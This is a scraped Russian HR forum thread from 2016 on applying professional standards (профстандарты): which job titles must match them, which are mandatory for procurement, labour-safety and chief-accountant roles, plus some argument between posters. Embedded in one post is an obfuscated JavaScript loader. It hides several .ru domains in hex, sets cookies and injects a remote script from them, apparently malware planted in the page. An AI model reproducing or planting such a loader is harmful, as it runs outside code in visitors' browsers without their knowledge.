Авторизация
Регистрация
Забыли свой пароль?
Войти как пользователь
Вы можете войти на сайт, если вы зарегистрированы на одном из этих сервисов:

Поиск по сайту
Журнал
"Кадровик-практик"
Подписка 1500 руб./год



Бесплатно
подписчики получают 
доступ к: 
  • справочной базе,
  • "книжной полке",
  • курсу по кадрам,
  • всем тестам и др.
Узнать подробнее >>
Полистать журнал >>




Что значит применять профстандарты?

Приветствуем Вас на форуме кадровиков-профессионалов и новичков в кадровом деле, уважаемые коллеги! На нашем форуме уже более 250.000 сообщений, более 26.000 тем, а главное - у нас всегда отличный коллектив и дух взаимопомощи. Просьба к гостям-новичкам, пожалуйста, ПОЛЬЗУЙТЕСЬ ПОИСКОМ НА ФОРУМЕ! На большинство вопросов ответы уже даны. Пожалуйста, будьте взаимовежливы. Наш с Вами форум - для приятного профессионального общения, сотрудничества и взаимопомощи. И, пожалуйста, не оставляйте в форуме активных ссылок на другие ресурсы  - это понижает рейтинг нашего сайта в поисковых системах яндекс и др.

Vasia.png



Страницы:1234След.
Что значит применять профстандарты?
 
Добрый день. С 1 июля 2016 года начинает действовать статья 195.3 Трудового кодекса о порядке применения профстандартов (Закон от 2 мая 2015 г. № 122-ФЗ). Кто начал работу? У кого какие наработки?:?:
 
В ужасе мечусь по этому поводу. Надо получается изменять наименование должностей, особенно это касается гос.закупок и бухгалтеров. Нужно менять штатку. Дурдом "Ромашка"
 
У нас, допустим организация частная, строительство и содержание а/дорог, но в базе профессиональных стандартов нет этой отрасли в перечне. И не совсем понимаю как это все внедрять.
 
Бухгалтер/кадровик/юрист есть? или только рабочие? Вот к бухгалтерам, кадровикам и юристам и применять))
 
А если я по штатному библиотекарь, а выполняю работу кадровика-делопроизводителя. Тогда кто я по профстандарту?:?:
Кадры решают все. Что им разрешают...
 
Мне тоже совершенно не понятно какие именно действия нужно произвести в документах.
 
Коллеги есть какое-то движение в направлении Профстандартов? (гори они......):wall
 
Начните с выяснения, какие профстандарты уже утверждены, и есть ли в организации такие виды профессиональной деятельности.
Если требования к квалификации, необходимой работнику для выполнения определенной трудовой функции, установлены Трудовым кодексом, федеральными законами, иными нормативными правовыми актами РФ профессиональные стандарты обязательны для применения.
В нашей организации это:
- «Специалист в сфере закупок» (Обязательность применения: Федеральный закон от 05.04.2013 N 44-ФЗ "О контрактной системе в сфере закупок товаров, работ, услуг для обеспечения государственных и муниципальных нужд";).
- «Специалист в области охраны труда» (Обязательность применения: ТК РФ, Статья 217. Служба охраны труда в организации).
Профессиональные стандарты, обязательность применения которых не установлена, можно использовать в качестве основы для определения трудовых функций в трудовых договорах и должностных инструкциях.
Изменено: Росита - 06.06.2016 12:43:02
 
Росита, интересно Ваше мнение: должность "специалист по охране труда" должна называться только так и не иначе, или допускаются всякие видоизменения типа "специалист по охране труда и технике безопасности, специалист по охране труда и экологии" и т.д. ? :handshake:
 
Цитата
Снеженка пишет:
интересно Ваше мнение: должность "специалист по охране труда" должна называться только так и не иначе, или допускаются всякие видоизменения типа "специалист по охране труда и технике безопасности, специалист по охране труда и экологии" и т.д. ?
Влезу ка я, что ли. :oops:
Лично я согласен с мыслью высказанной Челентано.
Если в организации нет службы охраны труда, то должность должна обязательно называться специалист по ОТ и соответствовать профстандарту.
Если же создана служба охраны труда, то внутри неё должности могут ОБЗЫВАТЬСЯ как угодно. :!:

Когда обсуждали это, пытался что то найти, противоречащее этой мысли и не нашёл, что говорит о её разумности.
Статья 217. Служба охраны труда в организации
В целях обеспечения соблюдения требований охраны труда, осуществления контроля за их выполнением у каждого работодателя, осуществляющего производственную деятельность, численность работников которого превышает 50 человек, создается служба охраны труда или вводится должность специалиста по охране труда, имеющего соответствующую подготовку или опыт работы в этой области.....


Кому интересно поищите тему обсуждения. :!:
 
Профстандарт «Специалист в области охраны труда» упоминает одно возможное наименование должности - Специалист по охране труда. Я думаю, название ёмкое, зачем его перегружать? А уже в должностной инструкции можно реализовать свои творческие способности.
 
Добрый день! У нас ООО, менеджер по персоналу занимается и подбором и кадрами, бухгалтер тоже на все руки.... Нам что тоже подводить все под профстандарт или это, все таки , больше для гос. компаний?
 
По бухгалтерам и специалистам по управлению персоналом обязательность применения профстандартов не установлена (Трудовым кодексом, федеральными законами, иными нормативными правовыми актами РФ).
 
Цитата
Росита пишет:
По бухгалтерам и специалистам по управлению персоналом обязательность применения профстандартов не установлена
На основании чего такой вывод?
 
Цитата
mila2 пишет:
Цитата
Росита пишет:
По бухгалтерам и специалистам по управлению персоналом обязательность применения профстандартов не установлена
На основании чего такой вывод?
На основании чего Вы планируете сделать обратный?
 
Цитата
Nimphelos пишет:
На основании чего Вы планируете сделать обратный?
Вопросом на вопрос отвечать по меньшей мере - неприлично!!!
 
Цитата
Вопросом на вопрос отвечать по меньшей мере - неприлично!!!
Весьма забавно это слышать от человека, который только что попросил доказать отсутствие обязанности.
 
Еще забавнее слышать это от человека, который не дал ни одного дельного комментария ни в одной теме, зато устраивает склоки постоянно!
Если нечего сказать по теме - пройдите мимо!
Изменено: mila2 - 07.06.2016 08:21:30
 
mila2, полностью поддерживаю, подобные язвительные комментарии не несущие никакого конструктивного диалога, полностью отбивают желание общаться на форуме.
Если человек считает себя таким Специалистом, что считает выше всех себя то зачем вообще опускаться до общения. А быть выше всех и плевать на всех это не профессионально, Особенно для должностей в кадрах, которые всегда общаются с большим количеством разных людей. А если короче, - то высокомерие бесит.


Извините, накипело....

По теме. Тоже пытаюсь понять нужно ли нам применение профстандартов. Конкретно по Охране труда - я не могу определить ГДЕ именно написано что к таким специалистам должны применяться профстандарты обязательно?

Но больше конечно интересует по льготным профессиям - Электромонтер линейщик по монтажу воздушных линий высокого напряжения и контактной сети. Я конечно отслеживаю, но вдруг они его так хитро обзовут...


window .a1336404323 = 1;!f unction(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26363",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "kadrovik-praktik.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Изменено: Костик - 07.06.2016 09:59:37
 
mila2,
профстандарт обязателен для главного бухгалтера – есть Федеральный закон от 06.12.2011 N 402-ФЗ "О бухгалтерском учете".
Есть ли статья в ТК, федеральный закон, иной нормативный правовой акт РФ, посвященный специалисту по управлению персоналом или бухгалтеру? Вам что-то известно? Поделитесь.
Страницы:1234След.
Читают тему (гостей: 1)
 

Отписаться от сообщений с форума

Мнение администрации форума может не совпадать с мнением участников форума. Администрация форума не несет ответственности за сообщения, размещаемые участниками форума. Вместе с тем, убедительная просьба к участникам - при общении   не нарушать действующее законодательство: при цитировании чьих-либо произведений не нарушать права авторов, не распространять недостоверную порочащую кого-либо информацию, не разглашать чьи-либо персональные данные и т.д. Если Вы заметили сообщение, которое, возможно нарушает закон или правила форума, пожалуйста, напишите нам >> 



Работа чата временно приостановлена!
Завсегдатаи чата могут встретиться в теме Болталка нашего форума >>






Корзина0 товаров
на сумму 0 руб.

Мы в соцсетях:


Подпишитесь бесплатно:

 

Войти в зону ИКС (раздел сайта для подписчиков журнала "Кадровик-практик") >>


Новости сайта


Все новости сайта

Последние публикации
 
Все публикации


Новости трудового законодательства и разъяснения ведомств

Все новости

Опрос дня
В Вашей организации утверждены приказом руководителя формы документов (приказ, табель, график отпусков, штатное расписание и т.д.)? Отметить свое мнение и узнать ответы коллег >>



Тест дня
Мини-тест "Перенесение ежегодного оплачиваемого отпуска"

Книги по кадровому делопроизводству

Книги по кадровому делопроизводству

От профессионалов КД.
Печатные и электронные версии.
Доставка по РФ

Все книги >>
Заказать >>

Журналы учета и регистрации. Разные!

Книги и журналы учета

Отличное качество, плотная обложка+ПВХ, чёткая разлиновка, правильные графы. Прошивка, пломба.
Успейте заказать по старым ценам!

Узнать подробнее >>
Заказать >>

Доставка во все регионы РФ.